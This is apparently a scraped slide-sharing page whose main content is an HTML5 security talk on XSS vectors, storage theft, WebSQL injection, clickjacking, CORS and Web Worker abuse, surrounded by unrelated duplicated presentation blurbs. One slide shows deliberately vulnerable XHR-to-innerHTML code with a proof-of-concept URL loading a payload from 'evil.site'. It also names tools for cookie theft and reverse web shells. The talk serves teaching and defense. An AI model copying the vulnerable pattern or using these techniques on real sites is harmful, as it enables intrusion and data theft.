This document discusses HTML5 security threats and defenses. It covers the history of HTML standards, new HTML5 features, and vulnerabilities like XSS, cookie/storage stealing, SQL injection, and more. It also provides tools for analyzing HTML5 threats and examples of real attacks exploiting features like WebSQL, local storage, and cross-origin requests. Defenses include input validation, avoiding sensitive data storage, and configuring CORS headers appropriately.
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
Watch the slides of our webinar on “How to secure MongoDB with ClusterControl” and find out about the essential steps necessary to secure MongoDB and how to verify if your MongoDB instance is safe.
The recent MongoDB ransom hack caused a lot of damage and outages, while it could have been prevented with maybe two or three simple configuration changes. MongoDB offers a lot of security features out of the box, however it disables them by default.
In this webinar, we explain which configuration changes are necessary to enable MongoDB’s security features, and how to test if your setup is secure after enablement. We also demonstrate how ClusterControl enables security on default installations. And we cover how to leverage the ClusterControl advisors and the MongoDB Audit Log to constantly scan your environment, and harden your security even more.
AGENDA
What is the MongoDB ransom hack?
What other security threats are valid for MongoDB?
How to enable authentication / authorisation
How to secure MongoDB from ransomware
How to scan your system
ClusterControl MongoDB security advisors
Live Demo
SPEAKER
Art van Scheppingen is a Senior Support Engineer at Severalnines. He’s a pragmatic MySQL and Database expert with over 15 years experience in web development. He previously worked at Spil Games as Head of Database Engineering, where he kept a broad vision upon the whole database environment: from MySQL to Couchbase, Vertica to Hadoop and from Sphinx Search to SOLR. He regularly presents his work and projects at various conferences (Percona Live, FOSDEM) and related meetups.
Apache Shiro, a simple easy-to-use framework to enforce user security by Shiro PMC Chair and Stormpath CTO, Les Hazlewood.
http://shiro.apache.org
http://stormpath.com
Webinar slides: How to Secure MongoDB with ClusterControlSeveralnines
Watch the slides of our webinar on “How to secure MongoDB with ClusterControl” and find out about the essential steps necessary to secure MongoDB and how to verify if your MongoDB instance is safe.
The recent MongoDB ransom hack caused a lot of damage and outages, while it could have been prevented with maybe two or three simple configuration changes. MongoDB offers a lot of security features out of the box, however it disables them by default.
In this webinar, we explain which configuration changes are necessary to enable MongoDB’s security features, and how to test if your setup is secure after enablement. We also demonstrate how ClusterControl enables security on default installations. And we cover how to leverage the ClusterControl advisors and the MongoDB Audit Log to constantly scan your environment, and harden your security even more.
AGENDA
What is the MongoDB ransom hack?
What other security threats are valid for MongoDB?
How to enable authentication / authorisation
How to secure MongoDB from ransomware
How to scan your system
ClusterControl MongoDB security advisors
Live Demo
SPEAKER
Art van Scheppingen is a Senior Support Engineer at Severalnines. He’s a pragmatic MySQL and Database expert with over 15 years experience in web development. He previously worked at Spil Games as Head of Database Engineering, where he kept a broad vision upon the whole database environment: from MySQL to Couchbase, Vertica to Hadoop and from Sphinx Search to SOLR. He regularly presents his work and projects at various conferences (Percona Live, FOSDEM) and related meetups.
Apache Shiro, a simple easy-to-use framework to enforce user security by Shiro PMC Chair and Stormpath CTO, Les Hazlewood.
http://shiro.apache.org
http://stormpath.com
Super simple application security with Apache ShiroMarakana Inc.
Les Hazlewood, founder of the Apache Shiro project, covers the benefits of using Shiro as an application security framework.
Check out the video for this presentation, as well as more training resources for Java here: http://marakana.com/forums/java/general/183.html
Top 10 F5 iRules to migrate to a modern load balancing platformAvi Networks
With the advent of automation, iRules have become an artifact of the past. Especially when the most commonly deployed F5 iRules such as HTTP redirects, content switching, or logging, require custom scripting. It can be a huge pain for an IT team to train staff on convoluted syntax and manual conversions. Avi eliminates most iRules (#iRulesNoMore) – basic or advanced – with native point-and-click functionalities.
Watch this webinar to learn:
- How over 75% of F5 iRules can be accommodated by native point-and-click features
- Top 10 iRules that can be migrated to native policies on the Avi Vantage Platform
- How advanced and custom use cases are easily configured with Avi’s DataScript
Full webinar: https://info.avinetworks.com/webinars-avi-tech-corner-episode-2
Slides from Apache Shiro User Group presentation by Les Hazlewood on API design and RESTful API security using Shiro. Demonstrates design and security principles using Stormpath API.
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
Web Security: Cookies, Domains and CORS
Юрий Чайковский
О предложенном еще в 1995 году и актуальным до сегодняшнего дня принципе одинакового источника (Same-origin policy) и о применении и ограничениях при междоменных запросах. Пример CSRF атак, а также правила конфигурации сервера для защиты от них. О последних нововведениях, касающихся контроля происхождения контента для предотвращения XSS атак. Кроме того:
- Принцип одинакового источника.
- Использование междоменных запросов.
- CSRF атаки (с демонстрацией).
- Классификация браузерных запросов.
- Ограничения междоменных запросов.
- Серверный контроль доступа.
- Особенности Internet Explorer 8, 9.
- Принцип безопасности контента (CSP).
An introduction to modern web technologies HTML5, including Offline, Storage, and Canvas Embedded JavaScript RESTful WebServices using MVC 3, jQuery, and JSON Going mobile with PhoneGap and HTML and CSS
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
Beyond PHP - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
Breno Oliveira, Líder Técnico Moip, ministrou o workshop "Elastic Search: Turbinando sua aplicação PHP", no PHP Experience 2016.
O iMasters PHP Experience 2016 aconteceu nos dias 21 e 22 de Março de 2015, no Hotel Tivoli em São Paulo-SP
http://phpexperience2016.imasters.com.br/
Super simple application security with Apache ShiroMarakana Inc.
Les Hazlewood, founder of the Apache Shiro project, covers the benefits of using Shiro as an application security framework.
Check out the video for this presentation, as well as more training resources for Java here: http://marakana.com/forums/java/general/183.html
Top 10 F5 iRules to migrate to a modern load balancing platformAvi Networks
With the advent of automation, iRules have become an artifact of the past. Especially when the most commonly deployed F5 iRules such as HTTP redirects, content switching, or logging, require custom scripting. It can be a huge pain for an IT team to train staff on convoluted syntax and manual conversions. Avi eliminates most iRules (#iRulesNoMore) – basic or advanced – with native point-and-click functionalities.
Watch this webinar to learn:
- How over 75% of F5 iRules can be accommodated by native point-and-click features
- Top 10 iRules that can be migrated to native policies on the Avi Vantage Platform
- How advanced and custom use cases are easily configured with Avi’s DataScript
Full webinar: https://info.avinetworks.com/webinars-avi-tech-corner-episode-2
Slides from Apache Shiro User Group presentation by Les Hazlewood on API design and RESTful API security using Shiro. Demonstrates design and security principles using Stormpath API.
WebCamp: Developer Day: Web Security: Cookies, Domains and CORS - Юрий Чайков...GeeksLab Odessa
Web Security: Cookies, Domains and CORS
Юрий Чайковский
О предложенном еще в 1995 году и актуальным до сегодняшнего дня принципе одинакового источника (Same-origin policy) и о применении и ограничениях при междоменных запросах. Пример CSRF атак, а также правила конфигурации сервера для защиты от них. О последних нововведениях, касающихся контроля происхождения контента для предотвращения XSS атак. Кроме того:
- Принцип одинакового источника.
- Использование междоменных запросов.
- CSRF атаки (с демонстрацией).
- Классификация браузерных запросов.
- Ограничения междоменных запросов.
- Серверный контроль доступа.
- Особенности Internet Explorer 8, 9.
- Принцип безопасности контента (CSP).
An introduction to modern web technologies HTML5, including Offline, Storage, and Canvas Embedded JavaScript RESTful WebServices using MVC 3, jQuery, and JSON Going mobile with PhoneGap and HTML and CSS
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
Beyond PHP - it's not (just) about the codeWim Godden
Most PHP developers focus on writing code. But creating Web applications is about much more than just writing PHP. Take a step outside the PHP cocoon and into the big PHP ecosphere to find out how small code changes can make a world of difference on servers and network. This talk is an eye-opener for developers who spend over 80% of their time coding, debugging and testing.
Breno Oliveira, Líder Técnico Moip, ministrou o workshop "Elastic Search: Turbinando sua aplicação PHP", no PHP Experience 2016.
O iMasters PHP Experience 2016 aconteceu nos dias 21 e 22 de Março de 2015, no Hotel Tivoli em São Paulo-SP
http://phpexperience2016.imasters.com.br/
AtlasCamp 2014: 10 Things a Front End Developer Should Know About ConnectAtlassian
If you're a JavaScript developer, you can't miss this session. Atlassian Connect presents some challenges that might be new to JavaScript developers, like third-party cookie policy, window.postMessage, and sending data between multiple iframes, just to name a few. This session will address these challenges and offer practical tips from the trenches of building new add-ons with Atlassian Connect.
Palestra ministrada no OWASP Floripa Day - Florianópolis - SC |
A palestra tem como objetivo mostrar os conceitos e funcionamento de algumas funcionalidades que foram adicionadas ao HTML5, levando em consideração os aspectos de segurança do client-side. Para as funcionalidades destacadas, foram criados cenários de ataques visando ilustrar a obtenção de informações sensíves armazenadas no browser ou até mesmo usar o browser da vítima para lançar ataques contra outros sistemas. Através da exploração das funcionalidades existentes no HTML5, técnicas de exploração como XSS e CSRF, tornam-se mais poderosas e eficientes, sendo possível em alguns casos contornar algumas restrições do Same Origin Policiy (SOP).
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
How a new HTTP response header can help increase the depth of your web application defenses.
Also includes a few slides on HTTP Strict Transport Security, a header which helps protects HTTPS sites from sslstrip attacks.
This talk is a generic but comprehensive overview of security mechanism, controls and potential attacks in modern browsers. The talk focuses also on new technologies, such as HTML5 and related APIs to highlight new attack scenario against browsers.
Macroeconomics- Movie Location
This will be used as part of your Personal Professional Portfolio once graded.
Objective:
Prepare a presentation or a paper using research, basic comparative analysis, data organization and application of economic information. You will make an informed assessment of an economic climate outside of the United States to accomplish an entertainment industry objective.
Acetabularia Information For Class 9 .docxvaibhavrinwa19
Acetabularia acetabulum is a single-celled green alga that in its vegetative state is morphologically differentiated into a basal rhizoid and an axially elongated stalk, which bears whorls of branching hairs. The single diploid nucleus resides in the rhizoid.
Francesca Gottschalk - How can education support child empowerment.pptxEduSkills OECD
Francesca Gottschalk from the OECD’s Centre for Educational Research and Innovation presents at the Ask an Expert Webinar: How can education support child empowerment?
Model Attribute Check Company Auto PropertyCeline George
In Odoo, the multi-company feature allows you to manage multiple companies within a single Odoo database instance. Each company can have its own configurations while still sharing common resources such as products, customers, and suppliers.
Unit 8 - Information and Communication Technology (Paper I).pdfThiyagu K
This slides describes the basic concepts of ICT, basics of Email, Emerging Technology and Digital Initiatives in Education. This presentations aligns with the UGC Paper I syllabus.
Executive Directors Chat Leveraging AI for Diversity, Equity, and InclusionTechSoup
Let’s explore the intersection of technology and equity in the final session of our DEI series. Discover how AI tools, like ChatGPT, can be used to support and enhance your nonprofit's DEI initiatives. Participants will gain insights into practical AI applications and get tips for leveraging technology to advance their DEI goals.
Read| The latest issue of The Challenger is here! We are thrilled to announce that our school paper has qualified for the NATIONAL SCHOOLS PRESS CONFERENCE (NSPC) 2024. Thank you for your unwavering support and trust. Dive into the stories that made us stand out!
Synthetic Fiber Construction in lab .pptxPavel ( NSTU)
Synthetic fiber production is a fascinating and complex field that blends chemistry, engineering, and environmental science. By understanding these aspects, students can gain a comprehensive view of synthetic fiber production, its impact on society and the environment, and the potential for future innovations. Synthetic fibers play a crucial role in modern society, impacting various aspects of daily life, industry, and the environment. ynthetic fibers are integral to modern life, offering a range of benefits from cost-effectiveness and versatility to innovative applications and performance characteristics. While they pose environmental challenges, ongoing research and development aim to create more sustainable and eco-friendly alternatives. Understanding the importance of synthetic fibers helps in appreciating their role in the economy, industry, and daily life, while also emphasizing the need for sustainable practices and innovation.
Exploiting Artificial Intelligence for Empowering Researchers and Faculty, In...Dr. Vinod Kumar Kanvaria
Exploiting Artificial Intelligence for Empowering Researchers and Faculty,
International FDP on Fundamentals of Research in Social Sciences
at Integral University, Lucknow, 06.06.2024
By Dr. Vinod Kumar Kanvaria
2. Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
3. History
HTML1.0——1993.6 Not Standard
HTML 2.0——1995.11 RFC 1866
HTML 3.2——1996.1.14 W3C Recommended Standard
HTML 4.0——1997.12.18 W3C Recommended Standard
HTML 4.01——1999.12.24 W3C Recommended Standard
XHTML——2000.1.20 W3C Recommended Standard
HTML5——2008 First Draft Standard
2012 W3C Candidate Recommendation
4. Features
The three aspects of HTML5
▪ Content HTML
▪ New Tags and Attributes
▪ Presentation of content CSS
▪ Interaction with content JavaScript
▪ Add New API Drag LocalStorage WebWorkers etc
8. XSS abuse with tags and attributes
Hiding URL Code
Stealing from the storage
Injecting and Exploiting WebSQL
ClickJacking &&CookieJacking
Cross Origin Request and postMessage
Client‐side File Includes
Botnet and widgets
9. In:
New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>
New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for
input
New media events
New <canvas> tag for 2D rendering
New form controls for date and time
Geolocation
New selectors
Client-side storage including localStorage, sessionStorage, and WebSQL
Out:
Presentation elements such a <font>, <center>
Presentation attributes including align, border
<frame>,<frameset>
<applet>
Old special effects: <marquee>,<bgsound>
<noscript>
10. Attack:
New XSS Vector
Bypass Black-list Filter
Defense:
Add new tags to Black-list
Change Regex
11.
12. DOM
window.history.back();
window.history.forward();
window.history.go();
HTML5
history.pushState()
▪ history.pushState(state object,title,URL);
history.replaceState()
▪ The same with pushState,but modifies the current
history entry.
15. Type
LocalStorage:for long-term storage
SessionStorage:for the session application(last
when the browser closed)
Differences
Cookies:4k
LocalStorage/ SessionStorage:depends on
browser(usually 5MB)
Support
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
10.50
18. Attack
Get the data from the storage(cookie,passwd,etc)
Storage your xss shellcode
Unlimit the path
Defense
Don’t store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HTTPOnly and
Secure flags
19.
20. Database Storage
The same as the Google Gears
Operate
openDatabase("Database Name", "Database Version", "Database
Description", "Estimated Size");
transaction("YOUR SQL STATEMENT HERE");
executeSql();
Type
SQLite (support by WebKit)
21. Attack
Store shellcode
SQL inject
Defense
Strick with the sql operate
Encode the sql result before display
Don’t store sensitive data
23. SQL Injection
Use sqlite_master
▪ SELECT name FROM sqlite_master WHERE type='table'
▪ SELECT sql FROM sqlite_master WHERE
name='table_name'
▪ SELECT sqlite_version()
Select with ?
▪ executeSql("SELECT name FROM stud WHERE id=" +
input_id); False
▪ executeSql("SELECT name FROM stud WHERE id=?",
[input_id]); True
24. Drag and drop basics
Drag Data
the drag feedback image
drag effects
Drag events:
dragstart
dragenter
dragover
dragleave
drag
drop
dragend
28. CookieJacking
Use many technology to steal user’s local cookies
Technology
How to read the local fileiframe+file://
How to detect the state of cookies Clickjacking
How to send cookiesSMB
29.
30. Defense
Use iframe with sandbox
If (top !== window) top.location=
window.location.href;
if (top!=self) top.location.href=self.location.href
33. Defense
Check the postMessage origin
Don’t use innerHTML
▪ Element.innerHTML=e.data;//danger
▪ Element.textContent=e.data;//safe
Don’t use Eval to deal with the mesage
34. Cross-Origin Resource Sharing
▪ Originally Ajax calls were subject to Same Origin Policy
▪ Site A cannot make XMLHttpRequests to Site B
▪ HTML5 makes it possible to make these cross domain calls
▪ Site ASite B(Response must include a header)
▪ Access-Control-Allow-Origin: Site A Must
▪ Access-Control-Allow-Credentials: true | false
▪ Access-Control-Expose-Headers:
▪ etc
38. Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function(){if(x.readyState==4){
document.getElementById("main").innerHTML=x.responseText;}}
x.send();
</script>
<div id=“main”></div>
</body></html>
POC
Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php
VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>
New type of XSS!!
39.
40. Web Workers
running scripts in the background independently
Very simple
var w = new Worker("some_script.js");
w.onmessage = function(e) { // do something };
w.terminate()
Access
▪ XHR,navigator object,application cache,spawn other workers!
Can’t access
▪ DOM,window,document objects
41. Attack
Botnet
▪ Application‐level DDoS attacks
▪ Email Spam
▪ Distributed password cracking
Network Scanning
Guessing User’s Private IP Address
▪ Identify the user’s subnet
▪ Identify the IP address
43. HTML5CSdump
enumeration and extraction techniques described
before to obtain all the client-side storage relative
to a certain domain name
JS-Recon
Port Scans
Network Scans
Detecting private IP address
44. Imposter
Steal cookies
Set cookies
Steal Local Shared Objects
Steal stored passwords from FireFox
etc
Shell of the Future
Reverse Web Shell handler
Bypass anti-session hijacking measures
45. Ravan
JavaScript based Distributed Computing system
hashing algorithms
▪ MD5
▪ SHA1
▪ SHA256
▪ SHA512